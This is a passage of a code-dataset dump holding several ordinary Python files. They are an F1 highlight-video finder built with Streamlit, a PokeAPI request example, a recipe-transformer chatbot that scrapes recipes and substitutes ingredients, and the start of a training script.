'Yes'},\n 19: {'Grand Prix': 'United States', 'Circuit': 'Austin', 'Date': '22 October', 'Sprint': 'Yes'},\n 20: {'Grand Prix': 'Mexico City', 'Circuit': 'Mexico City', 'Date': '29 October', 'Sprint': 'No'},\n 21: {'Grand Prix': 'Sao Paulo', 'Circuit': 'Interlagos', 'Date': '05 November', 'Sprint': 'Yes'},\n 22: {'Grand Prix': 'Las Vegas', 'Circuit': 'Las Vegas', 'Date': '18 November', 'Sprint': 'No'},\n 23: {'Grand Prix': 'Abu Dhabi', 'Circuit': 'Yas Marina', 'Date': '26 November', 'Sprint': 'No'}\n}\n\n\n\n\n\ndef getAllRaces(gp_schedule):\n\n calendar_data = {}\n for race_number, gp_info in gp_schedule.items():\n grand_prix_name = gp_info['Grand Prix']\n date_str = gp_info['Date']\n sprint_check = (gp_info['Sprint'])\n \n\n # Convert the date string to a datetime object\n date_obj = datetime.strptime(date_str, '%d %B')\n\n # Add the year to the date object\n date_obj = date_obj.replace(year=datetime.today().year)\n\n\n # Calculate the difference between the date from the website and today's date\n date_diff = date_obj - datetime.today()\n\n # If the date is within 4 days of today or has already passed, add it to the dictionary\n if 
date_diff <= timedelta(days=4):\n            calendar_data[race_number] = (grand_prix_name, date_str,sprint_check)\n\n    for race_number, (grand_prix_name, date_str, sprint_check) in reversed(calendar_data.items()):\n        button = st.button(f\"Race {race_number}: {grand_prix_name}\", key=race_number)\n        if button:\n            \n\n            actualName = grand_prix_name\n\n\n\n            FP1name = '\"FP1 Highlights | 2023 ' + actualName + ' Grand Prix\"'\n            FP2name = '\"FP2 Highlights | 2023 ' + actualName + ' Grand Prix\"'\n            FP3name = '\"FP3 Highlights | 2023 ' + actualName + ' Grand Prix\"'\n            Quali = '\"Qualifying Highlights | 2023 ' + actualName + ' Grand Prix\"'\n            PoleLap = '\"Pole Lap | 2023 ' + actualName + ' Grand Prix | Pirelli\"'\n            SprintShootout = '\"Sprint Shootout Highlights | 2023 ' + actualName + ' Grand Prix\"'\n            SprintShootoutPoleLap = '\"Sprint Shootout Pole Lap | 2023 ' + actualName + ' Grand Prix\"'\n            Sprint = '\"Sprint Highlights | 2023 ' + actualName + ' Grand Prix\"'\n            Race = '\"Race Highlights | 2023 ' + actualName + ' Grand Prix\"'\n\n\n            if sprint_check == \"No\":\n                raceStages = [FP1name,FP2name,FP3name,Quali,PoleLap,Race]\n            else:\n                raceStages = [FP1name,Quali,PoleLap,SprintShootout,SprintShootoutPoleLap,Sprint,Race]\n\n\n            for stage in raceStages:\n                if not YTsearch2(stage):\n                    stage = stage.replace('\"',\"'\")\n                    if not YTsearch2(stage): \n                        stage = stage.replace(\"'\",\"\")\n                        YTsearch2(stage)\n\n            for item in allVideoLinks:\n                st.write(item)\n            \n\n\n\n\n\n\n\n\ndef YTsearch2(search_keyword):\n    search = CustomSearch(search_keyword, VideoUploadDateFilter.thisYear, limit = 2)\n\n\n    for video in search.result()['result']:\n        title = video['title']\n\n        search_keyword = search_keyword.replace('\"',\"\")\n        search_keyword = search_keyword.replace(\"'\",\"\")\n\n\n        if \"Pole\" in title:\n            if search_keyword in title:\n                if \"Shootout\" in title:\n                    lineToPrint = \"Shootout pole lap video - \" + video['link']\n                    allVideoLinks.append(lineToPrint)\n                    return lineToPrint\n                else:\n                    lineToPrint = \"Qualifying pole lap video - \" + video['link']\n                    allVideoLinks.append(lineToPrint)\n                    return lineToPrint\n            else:\n                pass\n        else:\n            if search_keyword == '\"'+title+'\"':\n                lineToPrint = title + \" - \" + video['link']\n                allVideoLinks.append(lineToPrint)\n                return lineToPrint\n            elif search_keyword == title:\n                lineToPrint = title + \" - \" + video['link']\n                allVideoLinks.append(lineToPrint)\n                return lineToPrint \n            else:\n                return None\n\n    \n\n\n\n\n\n\n\ngetAllRaces(gp_schedule)\n\n#for item in allVideoLinks:\n#    st.write(item)\n\n\n","repo_name":"cctij69/F1_highlights","sub_path":"F1_highlights.py","file_name":"F1_highlights.py","file_ext":"py","file_size_in_byte":6434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29317240703","text":"import requests\n\nresponse = requests.get(\"https://pokeapi.co/api/v2/type\")\n\n# Make a list of results from the response\nresults = response.json()[\"results\"]\n\n# Use a for loop to iterate over the list\nfor result in results:\n    # Print the name of each result\n    print(\"type\", result[\"name\"])","repo_name":"navikt/atom-laerlinger","sub_path":"PokemonOppgaver/Herman/oppgave2.py","file_name":"oppgave2.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25765929597","text":"from recipe_scrapers import scrape_me\nimport re\nimport nltk\nfrom nltk.tokenize import sent_tokenize\nimport nltk.tag, nltk.data\nimport spacy\nimport string\nfrom 
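The PokeAPI call in the record above reads only the first page of results; PokeAPI list endpoints also return a `next` URL, so a hedged pagination sketch (the `next`/`results` fields are how the API documents its list responses) looks like:

import requests

url = "https://pokeapi.co/api/v2/type"
while url is not None:
    payload = requests.get(url, timeout=10).json()
    for result in payload["results"]:
        print("type", result["name"])
    url = payload["next"]  # None once the last page is reached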
spacy.symbols import ORTH, POS, NOUN, VERB\n\nnlp_spacy = spacy.load(\"en_core_web_sm\")\n\nto_veg_link = \"https://www.allrecipes.com/recipe/24074/alysias-basic-meat-lasagna/\"\nfat_to_h_link = \"https://www.allrecipes.com/recipe/16167/beef-bourguignon-i/\"\nto_meat_link = \"https://www.allrecipes.com/recipe/244716/shirataki-meatless-meat-pad-thai/\"\n\ndescriptions = ['baked', 'beaten', 'blanched', 'boiled', 'boiling', 'boned', 'breaded', 'brewed', 'broken', 'chilled',\n\t\t'chopped', 'cleaned', 'coarse', 'cold', 'cooked', 'cool', 'cooled', 'cored', 'creamed', 'crisp', 'crumbled',\n\t\t'crushed', 'cubed', 'cut', 'deboned', 'deseeded', 'diced', 'dissolved', 'divided', 'drained', 'dried', 'dry',\n\t\t'fine', 'firm', 'fluid', 'fresh', 'frozen', 'grated', 'grilled', 'halved', 'hard', 'hardened',\n\t\t'heated', 'heavy', 'juiced', 'julienned', 'jumbo', 'large', 'lean', 'light', 'lukewarm', 'marinated',\n\t\t'mashed', 'medium', 'melted', 'minced', 'near', 'opened', 'optional', 'packed', 'peeled', 'pitted', 'popped',\n\t\t'pounded', 'prepared', 'pressed', 'pureed', 'quartered', 'refrigerated', 'rinsed', 'ripe', 'roasted',\n\t\t'roasted', 'rolled', 'rough', 'scalded', 'scrubbed', 'seasoned', 'seeded', 'segmented', 'separated',\n\t\t'shredded', 'sifted', 'skinless', 'sliced', 'slight', 'slivered', 'small', 'soaked', 'soft', 'softened',\n\t\t'split', 'squeezed', 'stemmed', 'stewed', 'stiff', 'strained', 'strong', 'thawed', 'thick', 'thin', 'tied', \n\t\t'toasted', 'torn', 'trimmed', 'wrapped', 'vained', 'warm', 'washed', 'weak', 'zested', 'wedged',\n\t\t'skinned', 'gutted', 'browned', 'patted', 'raw', 'flaked', 'deveined', 'shelled', 'shucked', 'crumbs',\n\t\t'halves', 'squares', 'zest', 'peel', 'uncooked', 'butterflied', 'unwrapped', 'unbaked', 'warmed', 'unseasoned',\n 'toasted', 'bunch', 'pre-cooked', 'taste', 'no-boil']\n\nconjunction_list = ['and', 'or', 'but', 'for', 'to']\n\ncooking_utensils = ['apple corker', 'apple cutter', 'baster', 'biscuit cutter', 'blow torch', 'pot', 'pan', 'bowls', 'pans', 'tong', 'skillet', 'wok', 'knife',\n 'bottle opener', 'bowl', 'bread knife', 'baking sheet', 'butter curler', 'cheese knife', 'cherry pitter', 'chinois', 'cleaver',\n 'colander', 'strainer', 'corkscrew', 'crab cracker', 'dough scraper', 'egg piercer', 'egg poacher', 'egg timer', 'fillet knife',\n 'fish scaler', 'scale', 'flour sifter', 'food mill', 'funnel', 'garlic press', 'grater', 'ladle', 'spoon', 'spatula', 'fork',\n 'lemon squeezer', 'lobster pick', 'measuring cup', 'meat grinder', 'thermometer', 'melon baller', 'mezzaluna', 'nutcracker',\n 'oven mitt', 'oven glove', 'peeler', 'pepper mill', 'pizza cutter', 'potato masher', 'pot-holder', 'poultry shears', 'rolling pin', 'scissors',\n 'tongs', 'whisk', 'wooden spoon', 'zester', 'cutting board', 'waffle iron', 'oven', 'microwave', 'blender', 'stove', 'aluminum foil', 'foil', 'baking dish', \n 'plastic wrap', 'wrap', 'dish', 'board', 'cutting board', 'grill', 'smoker', 'saucepan', 'mixer']\n\ncooking_actions = [\"preheat\", \"chop\", \"mince\", \"dice\", \"slice\", \"julienne\", \"grate\", \"peel\", \"crush\", \"mash\", \"puree\", \"blend\", \"whisk\", \"beat\",\n \"stir\", \"mix\", \"knead\", \"roll\", \"cut\", \"trim\", \"season\", \"marinate\", \"brine\", \"roast\", \"bake\", \"broil\", \"grill\", \"fry\", \"saute\", \"simmer\",\n \"boil\", \"steam\", \"poach\", \"blanch\", \"deglaze\", \"reduce\", \"glaze\", \"baste\", \"stuff\", \"garnish\", \"plate\", \"serve\", \"store\", \"freeze\", \"defrost\",\n \"thaw\", \"clean\", \"sanitize\", \"set 
up\", \"clean up\", \"heat\", \"discard\", \"pour\"]\n\nmeasures = [\"cup\", \"teaspoon\", \"tablespoon\", \"ounce\", \"fluid ounce\", \"quart\", \"pint\", \"gallon\", \"package\", \"jar\", \"can\", \"container\", \"pound\", \"clove\"]\n\nmeat_to_veg = {\n 'beef': 'portobello mushrooms',\n 'chicken': 'tofu',\n 'pork': 'jackfruit',\n 'turkey': 'tofu',\n 'lamb': 'eggplant',\n 'fish': 'tofu',\n 'shrimp': 'tofu',\n 'bacon': 'tempeh bacon',\n 'sausage': 'vegan sausage made from soy, seitan, or tempeh',\n 'ground beef': 'textured vegetable protein (TVP)',\n 'steak': 'portobello mushrooms',\n 'meatballs': 'vegan meatballs made from TVP, seitan, or lentils',\n 'hot dogs': 'vegan hot dogs made from soy, seitan, or tempeh',\n 'ribs': 'seitan ribs',\n 'meatloaf': 'vegan meatloaf made from lentils, TVP, or seitan',\n 'chorizo': 'vegan chorizo made from soy or seitan',\n 'ham': 'seitan ham',\n 'duck': 'seitan duck',\n 'beef jerky': 'vegan jerky made from soy, mushroom, or seitan',\n 'chicken nuggets': 'vegan nuggets made from soy, seitan, or tempeh',\n 'beef broth': 'vegetable broth',\n 'beef chuck roast': 'portobello mushrooms',\n 'beef sirloin' : 'portobello mushrooms'\n }\n\nveg_to_meat = {\n 'portobello mushrooms': 'steak',\n 'tofu': 'chicken',\n 'jackfruit': 'pork',\n 'eggplant': 'lamb',\n 'seitan': 'chicken',\n 'lentils': 'ground beef',\n 'black beans': 'beef',\n 'textured vegetable protein (TVP)': 'ground beef',\n 'chickpeas': 'ground turkey',\n 'mushrooms': 'beef',\n 'tempeh': 'chicken',\n 'tempeh bacon': 'bacon',\n 'coconut bacon': 'bacon',\n 'mushroom bacon': 'bacon',\n 'vegan sausage': 'sausage',\n 'vegan meatballs': 'meatballs',\n 'seitan ribs': 'ribs',\n 'vegan meatloaf': 'meatloaf',\n 'vegan chorizo': 'chorizo',\n 'seitan ham': 'ham',\n 'seitan duck': 'duck',\n 'vegan jerky': 'beef jerky',\n}\n\nfat_to_health = {\n 'sour cream': 'greek yogurt',\n 'cheese': 'low fat cheese',\n 'butter': 'coconut oil',\n 'vegetable oil': 'coconut oil',\n 'canola oil': 'avocado oil',\n 'dairy milk': 'almond milk',\n 'whole milk': 'almond milk',\n '2% milk': 'almond milk',\n 'milk': 'almond milk',\n 'all-purpose flour': 'whole wheat flour',\n 'white rice': 'brown rice',\n 'pasta': 'zucchini noodles (zoodles)',\n 'rice': 'cauliflower rice',\n 'mayonnaise or butter': 'avocado',\n 'ground beef': 'black beans',\n 'meat': 'tofu',\n 'white potatoes': 'sweet potatoes',\n 'lettuce': 'spinach',\n 'chocolate': 'unsweetened cocoa powder',\n 'ground beef': 'ground turkey',\n 'bread crumbs': 'rolled oats',\n 'sugar': 'honey or maple syrup',\n 'beef chuck roast': 'low-fat beef chuck roast',\n 'beef broth' : \"low-fat beef broth\",\n 'bacon' : 'turkey bacon'\n}\n\nhealth_to_fat = {\n 'greek yogurt': 'sour cream',\n 'low fat cheese': 'cheese',\n 'coconut oil': 'butter',\n 'avocado oil': 'canola oil',\n 'almond milk': 'whole milk',\n 'whole wheat flour': 'all-purpose flour',\n 'brown rice': 'white rice',\n 'zucchini noodles (zoodles)': 'pasta',\n 'cauliflower rice': 'rice',\n 'chia seeds': 'eggs',\n 'black beans': 'ground beef',\n 'tofu': 'meat',\n 'sweet potatoes': 'white potatoes',\n 'spinach': 'lettuce',\n 'unsweetened cocoa powder': 'milk chocolate',\n 'ground turkey': 'ground beef',\n 'rolled oats': 'bread crumbs',\n 'maple syrup': 'corn syrup',\n 'honey': 'sugar',\n 'brown sugar' : 'high fructose corn syrup',\n 'salmon steaks' : 'super fatty salmon steaks'\n}\n\n\nto_italian = {\n \"butter\": \"olive oil\",\n \"beef\": \"italian sausage\",\n \"duck\": \"italian sausage\",\n \"chorizo\": \"italian sausage\",\n 
\"cheese\": \"mozzarella\",\n \"herbs\": \"basil, oregano, rosemary, or thyme\",\n \"garlic\": \"fresh garlic\",\n \"rice\": \"risotto\",\n \"wine\": \"chianti\",\n \"vinegar\": \"balsamic vinegar\",\n \"heavy cream\": \"whole milk or half-and-half\",\n \"soy sauce\": \"balsamic vinegar\",\n \"cilantro\": \"parsley or basil\",\n \"ground beef\": \"ground italian sausage\",\n \"peanut oil\": \"olive oil\",\n \"sour cream\": \"ricotta cheese\",\n \"brown sugar\": \"honey\",\n \"soy milk\": \"almond milk\",\n \"ginger\": \"garlic\",\n \"white sugar\": \"raw sugar or honey\"\n}\n\nto_thai = {\n \"butter\": \"Coconut oil or palm oil\",\n \"chicken\": \"lemongrass chicken\",\n \"beef\": \"thai basil beef\",\n \"lamb\": \"massaman curry with lamb\",\n \"cheese\": \"coconut milk\",\n \"basil\": \"Thai basil\",\n \"tomatoes\": \"tamarind paste\",\n \"pasta\": \"rice noodles\",\n \"vinegar\": \"rice vinegar\",\n \"provolone cheese\" : \"thai cheese\"\n}\n\nto_gluten_free = {\n \"wheat flour\": \"almond flour\",\n \"rice\": \"quinoa\",\n \"couscous\": \"quinoa\",\n \"soy sauce\": \"tamari or coconut aminos\",\n \"tortillas\": \"corn tortillas\",\n \"pasta\": \"gluten-free pasta\",\n \"noodles\": \"sweet potato noodles\",\n \"oatmeal\": \"quinoa flakes\",\n \"all-purpose flour\" : \"almond flour\",\n \"ladyfingers\" : \"gluten free ladyfingers\",\n \"rolls\" : \"gluten free rolls\",\n \"hoagie rolls\" : \"gluten free hoagie rolls\"\n}\n\ngluten_free_to_gluten = {\n \"almond flour\": \"wheat flour\",\n \"quinoa\": \"rice\",\n \"tamari\": \"soy sauce\",\n \"oconut aminos\": \"soy sauce\",\n \"corn tortillas\": \"tortillas\",\n \"gluten-free pasta\": \"pasta\",\n \"sweet potato noodles\": \"noodles\",\n \"quinoa flakes\": \"oatmeal\",\n}\n\nto_lactose_free = {\n \"milk\": \"almond milk\",\n \"unsalted butter\": \"vegan butter\",\n \"cheese\": \"vegan cheese\",\n \"Swiss cheese\" : \" vegan swiss cheese\",\n \"provolone cheese\": \"vegan provolone cheese\",\n \"mozzarella cheese\": \"vegan mozzarella cheese\",\n \"cream\": \"coconut cream\",\n \"yogurt\": \"coconut yogurt\",\n \"ice cream\": \"non-dairy ice cream\",\n \"sour cream\": \"coconut cream\",\n \"condensed milk\": \"coconut condensed milk\",\n \"whipped cream\": \"coconut cream\",\n \"semisweet chocolate\" : \"super dark chocolate\",\n \"chocolate\": \"dark chocolate\",\n \"cream cheese\" : \"vegan cream cheese\",\n \"mascarpone cheese\" : \"vegan mascarpone cheese\",\n \"heavy cream\" : \"dairy free heavy cream\"\n}\n\nlactose_free_to_dairy = {\n \"almond milk\": \"milk substitutes\",\n \"vegan butter\": \"butter substitutes\",\n \"vegan cheese\": \"cheese substitutes\",\n \"coconut cream\": \"sour cream\",\n \"coconut yogurt\": \"yogurt substitutes\",\n \"non-dairy ice cream\": \"ice cream substitutes\",\n \"dark chocolate\": \"chocolate substitutes\",\n \"plant-based protein powders\": \"protein powder substitutes\"\n}\n\ndef removePunc(a_string):\n for char in string.punctuation:\n a_string = a_string.replace(char, \"\")\n\n return a_string\n\n\ndef preprocessSpacy():\n # retagging known entities for our spacy POS tagger\n\n ruler = nlp_spacy.get_pipe(\"attribute_ruler\")\n patterns = [\n { \n \"patterns\": [[{\"ORTH\": \"cook\"}], [{\"ORTH\": \"season\"}]], \n \"attrs\": {\"POS\" : \"VERB\"},\n }\n ]\n ruler.add_patterns(patterns)\n\nclass recipeStep:\n def __init__(self, step_num, step_text):\n self.step_num = step_num\n self.step_text = step_text\n # this should store ingredient object\n self.ingredients = []\n self.materials = []\n 
self.actions = []\n def __str__(self):\n return \"Step \" + str(self.step_num) + '\\n' + self.step_text\n \n def printStepIng(self):\n print(\"Step \" + str(self.step_num))\n print(\"INGREDIENTS\")\n for i in self.ingredients:\n print(i)\n print(\"\\n\")\n\nclass RecipeIngredient:\n def __init__(self, init_text):\n self.i_text = init_text\n self.ingredient = \"\"\n self.quantity = \"NA\"\n self.unit = \"\"\n self.descrips = []\n\n def __str__(self):\n return \"Text: \" + self.i_text + \"\\n\" + \"Ingredient: \" + str(self.ingredient) + \"\\n\" + \"Quantity: \" + str(self.quantity) + \"\\n\" + \"Unit: \" + str(self.unit) + \"\\n\" + \"Descrips: \" + str(self.descrips) + \"\\n\"\n \n \ndef makePlural(list):\n plural_list = []\n for i in list:\n plural_list.append(i + \"s\")\n return plural_list\n\ndef isFloat(str):\n try:\n float(str)\n return float(str)\n except ValueError:\n return \"NA\"\n\ndef buildIngredient(i_text):\n\n i_class = RecipeIngredient(i_text)\n\n my_regex = \"\\s\\(.*?\\)\"\n new_str = re.sub(my_regex, \"\", i_text)\n\n #checking for commas with descrips\n if \",\" in new_str:\n clause = new_str.split(\", \")\n i_class.descrips.append(clause[1])\n new_str = clause[0]\n\n i_list = new_str.split(\" \")\n # check if its a number first\n\n i_class.quantity = isFloat(i_list[0])\n if i_class.quantity != \"NA\":\n i_list.pop(0)\n\n class_ingredient_list = []\n\n for element in i_list:\n #print(element)\n if element in measures or element in makePlural(measures):\n i_class.unit = element\n elif element in descriptions:\n i_class.descrips.append(element)\n else:\n if element not in conjunction_list:\n class_ingredient_list.append(element)\n\n i_class.ingredient = (\" \").join(class_ingredient_list)\n\n return i_class\n \ndef recipe_ingredients(scraper):\n ingredients = scraper.ingredients()\n #print(ingredients)\n global all_ingredients\n global all_ingredients_text\n all_ingredients_text = []\n all_ingredients = []\n for ing in ingredients:\n # pass \n ing_class = buildIngredient(ing)\n all_ingredients.append(ing_class)\n #print(ing_class.ingredient)\n all_ingredients_text.append(ing_class.ingredient)\n\n return\n\n\ndef DoubleIt(steps_array):\n #print(\"DOUBLING\")\n \n for i in all_ingredients:\n if i.quantity != \"NA\":\n bool = False\n if i.quantity <= 1:\n bool = True\n temp = i.quantity\n i.quantity = temp*2\n #print(\"UPDATED: \" + str(i.quantity))\n if i.quantity > 1 and bool == True:\n if i.unit != \"\":\n i.unit = i.unit + \"s\"\n i.i_text = str(i.quantity) + \" \" + i.unit + \" \" + i.ingredient\n\n for step in steps_array:\n word_list = step.step_text.split(\" \")\n for inx, word in enumerate(word_list):\n if word in measures or any(word in i.ingredient for i in all_ingredients) or word in makePlural(measures):\n prev_word = word_list[inx - 1]\n quant = isFloat(prev_word)\n if quant != \"NA\":\n step.step_text = step.step_text.replace(prev_word, str(quant*2))\n \n\n\ndef HalfIt():\n for i in all_ingredients:\n if i.quantity != \"NA\":\n bool = False\n if i.quantity >= 1:\n bool = True\n temp = i.quantity\n i.quantity = temp/2\n if i.quantity < 1 and bool == True:\n if i.unit != \"\":\n i.unit = i.unit[0:len(i.unit)-1]\n i.i_text = str(i.quantity) + \" \" + i.unit + \" \" + i.ingredient\n \ndef Transform(type, steps_list):\n\n old_ingredients = all_ingredients\n for i in old_ingredients:\n try:\n #print(\"Old Ingredient\")\n #print(i.ingredient)\n replacement = type[i.ingredient]\n j = i.ingredient\n \n\n for step in steps_list:\n #print(step)\n for ing in 
step.ingredients:\n if replacement not in ing.ingredient:\n if i == ing:\n #print(\"FOUND REPLACEMENT: \" + replacement)\n #print(\"REPLACE: \" + j)\n ing.i_text = ing.i_text.replace(j, replacement)\n step.step_text = step.step_text.replace(j, replacement)\n ing.ingredient = replacement\n #print(\"TRANSFORM STEP\")\n #print(step.step_text)\n except:\n continue\n\n for i in all_ingredients:\n try:\n replacement = type[i.ingredient]\n i.i_text = i.i_text.replace(i.ingredient, replacement)\n i.ingredient = replacement\n except:\n continue\n \n prev_word = \"sdfgh\"\n for step in steps_list:\n word_list = step.step_text.split(\" \")\n for word in word_list:\n word = removePunc(word)\n try:\n replacement = type[word]\n if prev_word not in replacement:\n step.step_text = step.step_text.replace(word, replacement)\n except:\n pass\n prev_word = word\n \n\ndef findIngredient(text):\n for i in all_ingredients:\n if text in i.ingredient:\n return i\n return False\n\n#helper to check if word is already present in a list\ndef checkList(text, list):\n is_present = False\n for element in list:\n if text in element.lower():\n is_present = True\n return is_present\n\ndef setStepFields(step):\n banned_words = [\"heat\", \"sauce\", \"degrees\", \"c\", \"f\", \"temperature\", \"to\", \"a\", \"cheese\", \"-\", \"of\", \"hot\"]\n\n step_text = step.step_text.lower()\n spacy_doc = nlp_spacy(step_text)\n #print(\"STEP: \" + step_text)\n #print(all_ingredients_text)\n\n step_ingredients = []\n step_mats = []\n step_acts = []\n\n for chunk in spacy_doc.noun_chunks:\n #print(\"TEXT: \" + chunk.text, \"ROOT: \" + chunk.root.text, \"ROOT DEP: \" + chunk.root.dep_, \"ROOT HEAD: \" + chunk.root.head.text)\n if chunk.root.text in cooking_utensils:\n step_mats.append(chunk.text)\n step.materials.append(chunk.text)\n if chunk.text in all_ingredients_text:\n if findIngredient(chunk.text) is not False:\n step_ingredients.append(chunk.text)\n step.ingredients.append(findIngredient(chunk.text))\n elif checkList(chunk.root.text, all_ingredients_text) and not any(word in chunk.text for word in banned_words):\n if findIngredient(chunk.text) is not False:\n step_ingredients.append(chunk.text)\n step.ingredients.append(findIngredient(chunk.text))\n\n\n for token in spacy_doc:\n #print(\"TEXT: \" + token.text, \"POS: \" + token.pos_, \"TAG: \" + token.tag_)\n if (token.text in cooking_actions or token.pos_ == \"VERB\") and token.text not in step_acts:\n step_acts.append(token.text)\n step.actions.append(token.text)\n elif token.pos_ == \"NOUN\" and token.text in cooking_utensils:\n if not checkList(token.text, step_mats):\n step_mats.append(token.text)\n step.materials.append(chunk.text)\n elif token.text in all_ingredients_text and not checkList(token.text, step_ingredients):\n # if we are here, we have found an ingredient\n # add the corresponding ingredient object\n #step.ingredients.append(findIngredient(token.text))\n #if not checkList(token.text, step_ingredients):\n \n if findIngredient(token.text) is not False:\n step_ingredients.append(token.text)\n step.ingredients.append(findIngredient(token.text))\n elif checkList(token.text, all_ingredients_text) and token.text not in banned_words and not checkList(token.text, step_ingredients):\n \n if findIngredient(token.text) is not False:\n step_ingredients.append(token.text)\n step.ingredients.append(findIngredient(token.text))\n\n #elif checkList(token.text, all_ingredients_text):\n #step_ingredients.append(token.text)\n \n \n #print(\"STEP MATS: \" + str(step_mats))\n 
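`Transform` above substitutes ingredient names token by token, so a multi-word key such as 'ground beef' can be shadowed by its substring 'beef'. One common guard, sketched here rather than taken from the original, is to apply the mapping longest-key-first on whole strings:

def substitute(text, mapping):
    # longest keys first so 'ground beef' wins over the shorter 'beef'
    for key in sorted(mapping, key=len, reverse=True):
        text = text.replace(key, mapping[key])
    return text

# e.g. substitute("brown the ground beef", meat_to_veg)
# -> "brown the textured vegetable protein (TVP)"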
#print(\"STEP INGS: \" + str(step_ingredients))\n #print(\"STEP ACTIONS: \" + str(step_acts))\n\n \n #print('\\n')\n return\n\ndef printSteps(steps_array):\n for i in steps_array:\n print(i)\n i.printStepIng()\n\n\n#builds a step class array\ndef buildStepsArray(scraper):\n #prolly want to keep track of where each action and ingredient falls in the step (later)\n instructions = scraper.instructions_list()\n new_instruction_list = []\n for instruction in instructions:\n new_instruction_list += sent_tokenize(instruction)\n\n\n steps_array = []\n\n for c, element in enumerate(new_instruction_list):\n #print(\"Loading Step \" + str(c+1))\n step = recipeStep(c+1, element)\n setStepFields(step)\n steps_array.append(step)\n\n return steps_array\n\ndef prettyPrint(steps_array):\n print(\"Ingredients:\")\n print(\"______________________________\\n\")\n for i in all_ingredients:\n print(\"\\t - \" + i.i_text)\n print('\\n')\n print(\"______________________________\")\n print(\"\\nDirections:\")\n print(\"______________________________\\n\")\n\n for step in steps_array:\n print(step, \"\\n\")\n \ndef printHelp():\n print(\"\\nThat recipe sounds scrumpdiddlyumptious! Here's the menu of ways you can transform this recipe:\\n\")\n print(\"1) Make it Vegetarian\\n\")\n print(\"2) Take a Vegetarian recipe and make it meaty\\n\")\n print(\"3) Make it Healthy\\n\")\n print(\"4) Take a Healthy recipe and add some good, American, unhealthy flavor!\\n\")\n print(\"5) Give it an Italian spin\\n\")\n print(\"6) Give it a Thai twist\\n\")\n print(\"7) Make it gluten free (and keep Callum alive)\\n\")\n print(\"8) Add some gluten \\n\")\n print(\"9) Make it lactose free\\n\")\n print(\"10) Add some dairy and strengthen those bones\\n\")\n print(\"11) Double the recipe\\n\")\n print(\"12) Half the recipe\\n\")\n print(\"\\nType in one of these numbers to get your meal started!\\n\")\n\ndef runChatbot():\n print(\"Welcome to Recipe Extravaganza 2.0!\\n\")\n booli = True\n while booli:\n try:\n recipe = input(\"Please give me a link to a recipe:\\n\")\n if recipe == \"quit\":\n print(\"Gone so soon? Come back with a recipe, have a nice day.\")\n return\n scraper = scrape_me(recipe, wild_mode = True)\n recipe_ingredients(scraper)\n title = scraper.title()\n steps_array = buildStepsArray(scraper)\n booli = False\n except:\n #print(\"\\nWhat, are you baked? You didn't give us a good link! Please try again\\n\")\n print(\"\\nHmm not sure I can read that link. 
We recommend you give us a recipe from one of these websites:\\nFoodNetwork.com\\nAllRecipes.com\\nTasteOfHome.com\\nDelish.com\\n\")\n \n printHelp()\n \n while True:\n \n query = input(\"Pick a transform \\n\")\n print('\\n')\n #query = related(query)\n if query == \"1\":\n Transform(meat_to_veg, steps_array)\n title = \"Vegetarian \" + title\n elif query == \"2\":\n Transform(veg_to_meat, steps_array)\n if \"Meatless\" in title:\n title = title.replace(\"Meatless\", \"\")\n if \"Vegetarian\" in title:\n title = title.replace(\"Vegetarian\", \"\")\n title = \"Super Meaty \" + title\n elif query == \"3\":\n Transform(fat_to_health, steps_array)\n title = \"Healthy \" + title\n elif query == \"4\":\n Transform(health_to_fat, steps_array)\n title = \"Nice and Fatty \" + title\n elif query == \"5\":\n Transform(to_italian, steps_array)\n title = \"Italian \" + title\n elif query == \"6\":\n Transform(to_thai, steps_array)\n title = \"Thai \" + title\n elif query == \"7\":\n Transform(to_gluten_free, steps_array)\n title = \"Gluten free \" + title\n elif query == \"8\":\n Transform(gluten_free_to_gluten, steps_array)\n if \"Gluten Free\" in title:\n title = title.replace(\"Gluten Free\", \"\")\n title = \"Now with gluten \" + title\n elif query == \"9\":\n Transform(to_lactose_free, steps_array)\n title = \"Dairy free \" + title\n elif query == \"10\":\n Transform(lactose_free_to_dairy, steps_array)\n title = \"Now with dairy \" + title\n elif query == \"11\":\n DoubleIt(steps_array)\n elif query == \"12\":\n HalfIt()\n \n print(\"______________________________\\n\")\n print(\"New Transformed Recipe:\")\n print(title)\n print(\"______________________________\")\n print(\"______________________________\\n\")\n prettyPrint(steps_array)\n\n check = 3\n while check == 3:\n query2 = input(\"Do you want to perform another transformation to this already transformed recipe? (Yes/No)\\n\")\n if query2.lower() == \"yes\":\n break\n elif query2.lower() == \"no\":\n print(\"Enjoy your new recipe! 
See you soon.\")\n check = 2\n else:\n print(\"I didn't understand that, please type yes or no.\")\n check = 3\n \n if check == 2:\n break\n\nif __name__ == \"__main__\":\n\n preprocessSpacy()\n\n # link = to_meat_link\n # scraper = scrape_me(link, wild_mode = True)\n\n\n # recipe_ingredients(scraper)\n # #print(all_ingredients_text)\n\n # steps_array = buildStepsArray(scraper)\n\n # Transform(veg_to_meat, steps_array)\n\n #printSteps(steps_array)\n\n runChatbot()\n\n #for i in all_ingredients:\n # print(i)\n\n #for i in all_ingredients:\n # print(i)\n\n\n #print(\"START OF TRANFROM STEPS\")\n #printSteps(steps_array)\n\n #for i in all_ingredients:\n # print(i)\n \n\n #for i in all_ingredients:\n # if i.ingredient == \"onion\":\n # i.ingredient = \"FUCKER\"\n\n #printSteps(steps_array)\n\n \n #print(\"VEGETARIAN TRANSFORM\")\n\n #for i in all_ingredients:\n #print(i)\n\n #print(\"DOUBLING RECIPE\")\n #DoubleIt(all_ingredients)\n\n #for i in all_ingredients:\n\n # print(i)\n\n","repo_name":"cbondy100/recipe_transformer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":25494,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13905049852","text":"# @Author: Enea Duka\n# @Date: 5/3/21\nfrom dataloaders.kinetics_loader import KineticsDataset\nfrom dataloaders.oops_ttibua_loader import OopsTtibua\nfrom torch.utils.data import DataLoader\n\nfrom models.pm_vtn import create_model\nfrom models.res3d_18 import create_r3d\nfrom transformer2x.vtn import create_model_trn_2x\nfrom rep_learning.train import train\nfrom utils.logging_setup import setup_logger_path\nfrom utils.arg_parse import opt\nfrom datetime import datetime\nimport warnings\n\n\ndef learn_representation():\n\n opt.sfx = str(\n 